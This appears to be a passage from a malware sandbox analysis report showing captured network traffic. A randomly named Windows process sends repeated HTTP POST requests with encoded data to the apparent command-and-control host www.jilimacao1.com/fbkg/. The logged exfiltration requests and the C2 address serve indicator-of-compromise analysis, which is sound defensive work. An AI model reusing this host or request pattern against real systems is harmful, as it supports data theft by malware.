6d 76 4c 61 2f 64 53 6d 48 36 44 30 57 53 33 30 32 71 79 74 35 33 48 6f 66 46 30 58 2b 38 77 63 56 33 6b 41 78 52 62 70 6e 5a 4b 4c 6b 36 47 66 54 55 66 64 6d 4c 46 71 57 4e 48 66 6f 73 4c 76 48 72 77 32 46 77 78 4b 39 46 54 4d 6e 57 53 58 71 55 56 79 57 72 43 43 73 4f 6c 74 75 75 62 6d 6f 49 39 6c 79 41 4e 59 35 4b 4f 32 31 68 72 51 32 38 76 49 62 48 68 78 62 76 6d 66 72 43 4e 43 68 47 6c 63 6b 44 57 59 47 65 70 70 41 6a 76 7a 34 42 38 61 56 34 43 4c 47 67 61 70 2b 55 35 71 2f 66 39 6a 31 54 31 71 7a 74 44 67 67 4b 77 44 71 38 32 75 75 6e 6e 4f 70 54 53 6f 75 32 59 45 64 65 69 4a 30 39 69 44 37 51 6d 62 59 64 51 6a 50 38 54 68 36 36 35 78 62 45 6a 76 7a 33 4b 47 44 49 51 39 66 74 4a 39 32 4d 75 7a 6a 67 72 69 59 34 68 46 38 46 55 6c 78 75 76 53 34 57 49 73 4a 2b 6f 57 55 59 53 45 43 39 39 46 62 70 38 6c 32 66 53 49 52 71 56 63 59 6a 6a 4f 38 4a 45 66 50 45 6e 54 4d 4b 50 67 4f 44 69 55 41 6a 78 36 72 61 51 73 52 72 74 74 53 73 36 68 56 79 44 55 6f 69 61 43 59 4c 7a 56 54 67 6a 43 46 6d 4c 66 31 65 49 71 74 59 38 4c 62 30 37 57 4a 35 6b 33 56 64 31 44 76 67 6f 47 36 61 34 34 45 59 43 66 62 64 4c 52 77 30 4e 47 76 67 47 68 2f 4f 5a 67 6c 73 6a 58 6d 2b 62 48 35 69 4f 4b 53 58 6d 54 35 4a 49 6b 33 4a 51 47 45 56 53 70 65 47 54 58 4e 68 65 57 57 71 75 49 51 64 36 74 64 37 39 4b 45 55 32 71 78 4b 57 31 36 62 4b 5a 71 6b 62 72 77 70 36 72 73 39 64 51 32 41 51 57 79 63 6d 35 39 4f 77 68 4c 72 63 33 72 55 4b 48 76 43 63 62 6c 78 33 54 31 48 65 34 39 73 4a 71 4d 57 37 2f 43 6c 53 6b 7a 4d 69 6a 75 71 74 7a 55 77 6e 52 39 51 4f 69 52 51 68 79 72 5a 4a 4f 37 63 66 59 66 71 53 77 42 30 45 33 78 31 75 58 75 76 4e 34 44 32 6c 65 69 78 61 7a 77
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:32:45.810094118 CET1488OUTData Raw: 53 38 73 38 77 58 64 4b 6e 45 53 2f 33 56 48 6f 67 6a 33 6a 34 50 65 57 46 64 75 58 62 37 4f 4b 54 36 50 31 78 58 77 71 59 78 77 7a 2b 68 65 6e 64 58 56 30 36 43 59 55 59 45 45 4b 62 43 34 4d 64 38 7a 41 32 4e 38 46 4a 59 2f 6c 30 63 4e 33 72 57
                                                                                                                                                                                                Data Ascii: S8s8wXdKnES/3VHogj3j4PeWFduXb7OKT6P1xXwqYxwz+hendXV06CYUYEEKbC4Md8zA2N8FJY/l0cN3rWlQ6eLvuT0QqsOZr+PGCyujxnvkzjt3vCNWbd7G+rAqib0DlHju25jw8zc/9pPmUcdfLZMK0Gdjuert9HyRA/dMTcGzY8vAGLrNI1NJtlfHjwf82czZw3tJCv/083FITxhefj8npX6Egwv4qjCNhoUdEbV8cTwQsY9
                                                                                                                                                                                                Nov 17, 2023 19:32:45.810164928 CET1490OUTData Raw: 4a 38 33 65 59 50 62 61 61 44 6f 42 59 72 6d 6a 6e 36 71 61 62 4a 71 38 31 77 53 59 48 42 72 32 31 64 58 33 70 5a 73 77 43 36 6e 4d 39 65 35 70 61 79 74 34 77 30 74 57 43 78 7a 4d 72 46 45 6d 74 71 4b 4f 6b 6f 31 4e 4a 38 6a 46 54 37 36 75 46 43
                                                                                                                                                                                                Data Ascii: J83eYPbaaDoBYrmjn6qabJq81wSYHBr21dX3pZswC6nM9e5payt4w0tWCxzMrFEmtqKOko1NJ8jFT76uFCFDcUCLivRRQuQddCPoEaZYQ+beFFBwZkG/voUh4PvrQQRhhdPj7MuE+3T15Dy3FIdVQxTtlXPKNRIwf6jLirhd/TBYCkUnkYd6MSBVMzeT+kj4EAOhJNzCFTPiJ/5QtBvhUVyvtfAaCGFRaqLI+FtYxMAJKAnHixy
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147248983 CET1497OUTData Raw: 38 64 71 6c 43 34 59 72 53 71 5a 33 59 54 32 49 58 78 6d 45 65 5a 7a 4a 79 50 6b 4d 65 4b 4a 4c 4d 6f 7a 2f 30 48 36 70 75 47 63 36 32 49 6e 39 54 7a 67 78 76 6d 46 53 4b 54 64 70 47 69 68 67 66 4b 43 4e 76 77 38 50 4d 2f 35 48 65 42 56 79 2f 59
                                                                                                                                                                                                Data Ascii: 8dqlC4YrSqZ3YT2IXxmEeZzJyPkMeKJLMoz/0H6puGc62In9TzgxvmFSKTdpGihgfKCNvw8PM/5HeBVy/YFp9MhAILwe2lXL1zX6FD2tcvYTQjyOfInkJ8Raqt+VWP0/6zI2kg1yF6hrFQUg6SKhzayllduuuSgVKfmYPurMrUe6IIQ4e7g00nxPpAblPve7pxqgeRiqs8vruczlYolj7J5BO/NR5K/+qwC+cbQbw9kcq6ygor1
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147344112 CET1507OUTData Raw: 53 4f 38 30 37 64 72 70 58 4d 34 32 5a 38 51 63 54 51 74 43 31 34 69 43 68 41 76 62 34 31 2f 71 2f 51 63 6e 34 75 48 6e 4b 69 56 76 35 32 33 65 4a 59 32 4e 44 44 30 43 34 58 67 66 7a 58 58 75 6d 70 43 34 68 46 48 47 67 51 6a 7a 31 58 61 75 72 49
                                                                                                                                                                                                Data Ascii: SO807drpXM42Z8QcTQtC14iChAvb41/q/Qcn4uHnKiVv523eJY2NDD0C4XgfzXXumpC4hFHGgQjz1XaurIjYIPF0UZ+XxBvUvZX32sd2nu3byPLm/EHLyQPEv+exgeBPHnzoALpJ727i59GOrq8L044bxh+GOGoR3JDF9jDdstUU1JSUrseWfia3deT/cSyk7pTazd1Ms+Sy4p+kL/uSAMhVqQ2T1Vm4wv1sPbD/OqqxbgptXWu
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147433043 CET1513OUTData Raw: 68 43 37 35 2f 75 68 72 6c 37 4b 5a 67 46 77 74 2f 73 74 30 75 70 78 78 48 76 6e 4c 67 37 51 6c 78 33 54 67 64 75 41 53 4d 78 75 52 32 34 6c 63 46 56 70 34 48 55 2f 37 77 6a 79 31 5a 7a 6f 71 69 69 4d 39 4c 31 52 47 6d 35 70 71 63 42 4e 35 39 73
                                                                                                                                                                                                Data Ascii: hC75/uhrl7KZgFwt/st0upxxHvnLg7Qlx3TgduASMxuR24lcFVp4HU/7wjy1ZzoqiiM9L1RGm5pqcBN59sU/5WZBBxWa6lVk2pskggGeyusi1/qV/mmLmDR0tVvYRlZ0MTaTv70+4VduTyZZ1vnZhFKuhpb5umAyXDIQ3Rm+d/ZAXqJ/hwjs93ZtGe0IPEE1NdP9gSgXppRq/Z2qIp/wk8B6WyTS1d9Qp1cqyekCQjUu8ZIB1Fp
                                                                                                                                                                                                Nov 17, 2023 19:32:46.228158951 CET1514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:46 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486005068 CET1516OUTData Raw: 49 2b 52 69 4f 41 58 2f 55 69 33 45 5a 6c 70 42 61 47 4e 57 6b 70 43 2f 43 64 59 76 33 44 37 58 5a 2f 62 4e 42 43 6e 33 33 78 44 4e 71 49 6d 53 4f 41 32 68 4d 34 61 4f 61 6e 6c 59 49 45 56 2f 42 73 47 42 69 73 68 4c 33 61 35 6d 45 4c 57 66 6d 42
                                                                                                                                                                                                Data Ascii: I+RiOAX/Ui3EZlpBaGNWkpC/CdYv3D7XZ/bNBCn33xDNqImSOA2hM4aOanlYIEV/BsGBishL3a5mELWfmBe9AGhGaT8elHM4uYYPw8R/Ua9gWQ+lJA+ejR/XzqxxzU8CdgTchrW13OXaIdMpfvSSjc1kgUi7H3llOFdf0K16KbtXT7se2A0BPBV34lfTH0U9pWCMFLIUJ8jcihQNsz49H321zMXABCWnNz6tfOjtVZMp3JeZZxP
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486131907 CET1529OUTData Raw: 65 75 51 2f 6e 66 67 33 6b 59 73 4c 79 41 50 47 61 43 78 7a 59 59 52 47 55 75 43 48 53 61 33 38 78 73 51 76 51 71 68 6b 68 71 6f 30 48 2b 38 77 33 78 54 42 51 74 74 6e 66 77 4d 53 5a 63 6f 4c 70 68 32 36 4f 41 62 39 65 64 2f 30 43 31 53 77 75 6d
                                                                                                                                                                                                Data Ascii: euQ/nfg3kYsLyAPGaCxzYYRGUuCHSa38xsQvQqhkhqo0H+8w3xTBQttnfwMSZcoLph26OAb9ed/0C1SwumvwLhrnEGmqd3pSq6iXjNTPjdh57ifkIZrf0L+75SEty3Mb/bdhIN0/cNEjL/FK3NMZko3/o9/qro2+3f4DmOv6tPVSLKz+uVcNFP9YrVEHA60XQJk01SYdOQy+mJq/uFLzRetmGNiJvTj5zolip1+HC5NEI5kHTQe
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486222982 CET1531OUTData Raw: 44 4e 48 73 73 4c 45 76 67 66 51 55 35 6b 6f 48 59 4e 31 35 4f 74 63 68 62 6c 6f 6c 44 75 56 51 38 78 33 4c 39 6b 61 4e 44 46 58 2f 46 53 59 52 33 75 41 63 72 41 4d 78 68 73 45 4d 45 6f 42 77 44 36 55 6b 41 61 6b 74 2f 79 75 43 32 4a 74 57 6d 71
                                                                                                                                                                                                Data Ascii: DNHssLEvgfQU5koHYN15OtchblolDuVQ8x3L9kaNDFX/FSYR3uAcrAMxhsEMEoBwD6UkAakt/yuC2JtWmqwmLH4uFNayIjyA25sldGB+/uSQCQBahbq5+VqTqXCeNkHPT62JzlCHQaImnu+LBNJnPEnb8WYrPmerXBnynK9furiMXvkAgk7dEj/JuHsKGMxi9aACYSZ5ShxSrW6BswaYoUtF6TBoKNXM/0p5gXMdGc4FErkIcXw
                                                                                                                                                                                                Nov 17, 2023 19:32:47.107601881 CET1533OUTData Raw: 78 64 4b 61 6b 73 34 76 7a 6c 70 4e 6d 72 72 31 59 77 34 45 57 33 47 36 54 54 73 52 59 68 6d 77 36 52 6c 72 58 51 73 35 73 78 4e 50 34 6a 31 49 52 32 6f 69 34 6e 66 51 65 35 70 72 66 62 52 2f 7a 61 53 48 4e 6c 71 48 4e 78 65 6b 6c 33 59 57 61 32
                                                                                                                                                                                                Data Ascii: xdKaks4vzlpNmrr1Yw4EW3G6TTsRYhmw6RlrXQs5sxNP4j1IR2oi4nfQe5prfbR/zaSHNlqHNxekl3YWa2g0pL7pBe2LkuwTe8F2KnL2geSNd+nM7E3S0AphPngl4hkyXfJtDixXkhDzLuGTFR2BwmXxss8W5404BZ/69Wv2ndBTKbLO2PwbHf3GDx3CXn15wrqDFeS+7t0W+7bicGvjE07hqRE0bc/HiNn74oXCsaRdhpD1U10


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                78192.168.11.205020534.126.191.8480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:45.810019970 CET1480OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 55 46 41 57 54 31 6f 73 55 4a 78 47 5a 55 47 6c 58 43 59 4f 43 59 45 79 33 36 6e 4a 5a 36 58 43 48 53 7a 58 76 44 36 42 44 6e 55 65 58 2f 67 5a 62 2b 7a 4d 71 4e 65 2b 59 74 34 76 47 38 77 2b 74 66 38 6f 43 54 35 48 47 79 76 35 63 4e 33 33 63 7a 64 34 41 37 4f 57 7a 62 77 49 4a 51 47 51 4e 73 70 36 70 46 61 75 63 57 6b 49 4e 43 74 58 77 31 64 38 78 32 2f 59 2f 72 67 76 55 41 6e 6f 2f 32 44 35 61 79 57 6b 51 65 70 67 6d 6d 55 67 4a 4b 78 65 50 6d 4d 6e 49 31 6e 58 65 30 44 62 69 56 32 71 55 4b 77 71 6a 69 66 64 2b 70 70 4b 51 76 67 79 5a 59 6c 50 44 4a 4e 36 72 50 6d 76 45 78 6b 48 59 39 66 31 64 37 62 6a 31 57 59 79 78 74 66 73 69 76 69 54 53 56 66 46 79 30 71 74 4f 49 5a 41 4e 69 38 35 37 37 72 4b 61 73 2b 38 33 37 56 54 32 78 32 4f 30 49 6c 69 6f 34 38 7a 77 4c 47 42 37 52 51 62 4e 64 65 61 65 45 50 47 66 65 61 4a 70 4d 66 4c 59 79 30 45 51 71 37 6d 38 55 41 6c 57 52 57 41 44 75 34 44 44 63 30 6b 4a 77 50 37 69 33 41 36 71 43 5a 55 77 62 4b 73 69 79 6a 58 32 44 52 71 63 35 6e 52 4a 35 52 36 79 32 47 61 71 41 66 2f 6e 58 74 37 33 51 41 30 64 2f 68 38 5a 64 69 69 4c 50 37 6d 54 4f 6c 36 61 44 43 35 6a 6f 67 2f 6f 32 4e 39 46 4a 68 56 30 51 59 57 2f 75 54 78 77 75 35 53 59 51 4b 63 48 6e 66 4d 63 67 70 62 34 61 35 69 6f 73 72 36 63 68 76 33 37 35 58 67 37 36 6a 32 77 4c 5a 77 33 63 37 4f 45 33 6a 73 41 56 36 71 38 78 31 59 56 4e 4a 69 6f 6d 67 32 47 57 5a 39 4d 48 69 74 32 35 74 6a 71 71 4b 41 74 31 6a 43 41 49 34 30 59 53 2b 48 33 4b 37 4c 7a 38 2b 6b 31 78 51 78 54 4d 6a 6c 68 68 66 72 78 37 49 78 53 34 6d 65 52 5a 48 58 7a 50 7a 52 48 38 49 65 48 48 56 63 68 30 38 6e 44 2b 39 61 6a 65 46 58 75 56 4d 64 58 7a 4b 6b 74 49 33 2b 2b 57 77 73 49 63 6b 4a 6f 5a 34 66 78 67 31 58 52 4c 51 4b 4e 56 6c 4d 79 74 49 52 45 53 59 56 5a 30 76 78 75 73 34 4d 38 38 34 66 53 73 4c 76 72 77 73 62 30 5a 62 38 30 56 39 77 4f 63 4d 34 44 62 37 6b 5a 2f 48 48 69 58 6f 75 75 70 63 41 73 58 4c 41 49 6d 39 67 77 66 6b 73 76 31 75 4b 69 56 59 32 45 45 48 66 77 6b 59 37 52 4f 72 5a 77 4e 4d 52 58 45 36 4f 47 68 51 35 7a 67 42 44 48 79 4f 51 77 77 4d 52 74 6e 4b 70 4e 41 62 33 66 75 32 49 31 37 42 35 55 42 72 4a 78 6b 64 51 75 48 2b 4b 72 6f 6d 72 71 69 34 70 37 4a 42 48 48 6c 37 6b 53 49 61 48 47 45 64 75 63 74 50 70 6f 38 76 33 7a 42 31 6a 56 6c 4b 70 70 75 59 67 53 6c 63 68 6d 76 4c 61 2f 64 53 6d 48 36 44 30 57 53 33 30 32 71 79 74 35 33 48 6f 66 46 30 58 2b 38 77 63 56 33 6b 41 78 52 62 70 6e 5a 4b 4c 6b 36 47 66 54 55 66 64 6d 4c 46 71 57 4e 48 66 6f 73 4c 76 48 72 77 32 46 77 78 4b 39 46 54 4d 6e 57 53 58 71 55 56 79 57 72 43 43 73 4f 6c 74 75 75 62 6d 6f 49 39 6c 79 41 4e 59 35 4b 4f 32 31 68 72 51 32 38 76 49 62 48 68 78 62 76 6d 66 72 43 4e 43 68 47 6c 63 6b 44 57 59 47 65 70 70 41 6a 76 7a 34 42 38 61 56 34 43 4c 47 67 61 70 2b 55 35 71 2f 66 39 6a 31 54 31 71 7a 74 44 67 67 4b 77 44 71 38 32 75 75 6e 6e 4f 70 54 53 6f 75 32 59 45 64 65 69 4a 30 39 69 44 37 51 6d 62 59 64 51 6a 50 38 54 68 36 36 35 78 62 45 6a 76 7a 33 4b 47 44 49 51 39 66 74 4a 39 32 4d 75 7a 6a 67 72 69 59 34 68 46 38 46 55 6c 78 75 76 53 34 57 49 73 4a 2b 6f 57 55 59 53 45 43 39 39 46 62 70 38 6c 32 66 53 49 52 71 56 63 59 6a 6a 4f 38 4a 45 66 50 45 6e 54 4d 4b 50 67 4f 44 69 55 41 6a 78 36 72 61 51 73 52 72 74 74 53 73 36 68 56 79 44 55 6f 69 61 43 59 4c 7a 56 54 67 6a 43 46 6d 4c 66 31 65 49 71 74 59 38 4c 62 30 37 57 4a 35 6b 33 56 64 31 44 76 67 6f 47 36 61 34 34 45 59 43 66 62 64 4c 52 77 30 4e 47 76 67 47 68 2f 4f 5a 67 6c 73 6a 58 6d 2b 62 48 35 69 4f 4b 53 58 6d 54 35 4a 49 6b 33 4a 51 47 45 56 53 70 65 47 54 58 4e 68 65 57 57 71 75 49 51 64 36 74 64 37 39 4b 45 55 32 71 78 4b 57 31 36 62 4b 5a 71 6b 62 72 77 70 36 72 73 39 64 51 32 41 51 57 79 63 6d 35 39 4f 77 68 4c 72 63 33 72 55 4b 48 76 43 63 62 6c 78 33 54 31 48 65 34 39 73 4a 71 4d 57 37 2f 43 6c 53 6b 7a 4d 69 6a 75 71 74 7a 55 77 6e 52 39 51 4f 69 52 51 68 79 72 5a 4a 4f 37 63 66 59 66 71 53 77 42 30 45 33 78 31 75 58 75 76 4e 34 44 32 6c 65 69 78 61 7a 77
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfH1/E1ODT1PlRZJ1ExMfSYbh432ijfUFAWT1osUJxGZUGlXCYOCYEy36nJZ6XCHSzXvD6BDnUeX/gZb+zMqNe+Yt4vG8w+tf8oCT5HGyv5cN33czd4A7OWzbwIJQGQNsp6pFaucWkINCtXw1d8x2/Y/rgvUAno/2D5ayWkQepgmmUgJKxePmMnI1nXe0DbiV2qUKwqjifd+ppKQvgyZYlPDJN6rPmvExkHY9f1d7bj1WYyxtfsiviTSVfFy0qtOIZANi8577rKas+837VT2x2O0Ilio48zwLGB7RQbNdeaeEPGfeaJpMfLYy0EQq7m8UAlWRWADu4DDc0kJwP7i3A6qCZUwbKsiyjX2DRqc5nRJ5R6y2GaqAf/nXt73QA0d/h8ZdiiLP7mTOl6aDC5jog/o2N9FJhV0QYW/uTxwu5SYQKcHnfMcgpb4a5iosr6chv375Xg76j2wLZw3c7OE3jsAV6q8x1YVNJiomg2GWZ9MHit25tjqqKAt1jCAI40YS+H3K7Lz8+k1xQxTMjlhhfrx7IxS4meRZHXzPzRH8IeHHVch08nD+9ajeFXuVMdXzKktI3++WwsIckJoZ4fxg1XRLQKNVlMytIRESYVZ0vxus4M884fSsLvrwsb0Zb80V9wOcM4Db7kZ/HHiXouupcAsXLAIm9gwfksv1uKiVY2EEHfwkY7ROrZwNMRXE6OGhQ5zgBDHyOQwwMRtnKpNAb3fu2I17B5UBrJxkdQuH+Kromrqi4p7JBHHl7kSIaHGEductPpo8v3zB1jVlKppuYgSlchmvLa/dSmH6D0WS302qyt53HofF0X+8wcV3kAxRbpnZKLk6GfTUfdmLFqWNHfosLvHrw2FwxK9FTMnWSXqUVyWrCCsOltuubmoI9lyANY5KO21hrQ28vIbHhxbvmfrCNChGlckDWYGeppAjvz4B8aV4CLGgap+U5q/f9j1T1qztDggKwDq82uunnOpTSou2YEdeiJ09iD7QmbYdQjP8Th665xbEjvz3KGDIQ9ftJ92MuzjgriY4hF8FUlxuvS4WIsJ+oWUYSEC99Fbp8l2fSIRqVcYjjO8JEfPEnTMKPgODiUAjx6raQsRrttSs6hVyDUoiaCYLzVTgjCFmLf1eIqtY8Lb07WJ5k3Vd1DvgoG6a44EYCfbdLRw0NGvgGh/OZglsjXm+bH5iOKSXmT5JIk3JQGEVSpeGTXNheWWquIQd6td79KEU2qxKW16bKZqkbrwp6rs9dQ2AQWycm59OwhLrc3rUKHvCcblx3T1He49sJqMW7/ClSkzMijuqtzUwnR9QOiRQhyrZJO7cfYfqSwB0E3x1uXuvN4D2leixazw9ZSVsSfpytJtS/rz88pMVTPb78V1EelzR5NJ917ukHj02RumQn2MTnYMhgsIj6CaS90Kfh3ItH9VbX8om2zGldZ71BFdMUkbDgOcmUwU8Q8vMP1pCQUNTUnppWCqzUlPpsAewZhsbNzRDe3Y7jLkpkXuViGqdfsM7yen0pzWvQ6cLSd8Qif2h/pSH3DOZ4kTfTBqK8l86kp5aHEczSl3ZzapQfKvOZjxFGqRcDNq7hsLvBuyEBYGxAV1if5PvfpK+sb7RyKAB1r7kcXYcH2JD5RVMsxb1ZNPbh6u9pNJOiCWQ3r3Y+2qPi1JdgpqTQ52vkjLl3qsyQcPCTtAF/jk8X0Fws14yucP9JzNtbIeSlIBx3INsMqH2qIfT7I+VhweuVBWjlq7SzvtHQTGvIY8PgHTKsZdGkPHwY1cn/50twXPmXgzYEtRc7IAc5sNGOd1SlctsyfiEiCW3DHhq0ZU3nYVgaOoyjSc4Lc5YxNIc+uArjK0fDa+5RxnscMRyXwBWtzkOIDGw9zIl1fK5Zot3PC0kX7Pi9WoEXG9y1825mn2vkhz4ASXuQJWr4WMmhXtBh17/PF1lY30KNSk5LcsoN/hhacEZ/ZsKiNOTXcF3eottBVqDit4plNqqCFnD5gYRo+d6NFwo3NX32vYHmLErsp0gkEePZeYV2yvriT+/nxch0DdB0HlNyzCCrPXkMtRl8XSX0zRRgANrnemfRuk3U46KwA9NZO2MKyQBg3czu8NxtAQK5H+3HGblC5lHR8OmNUd
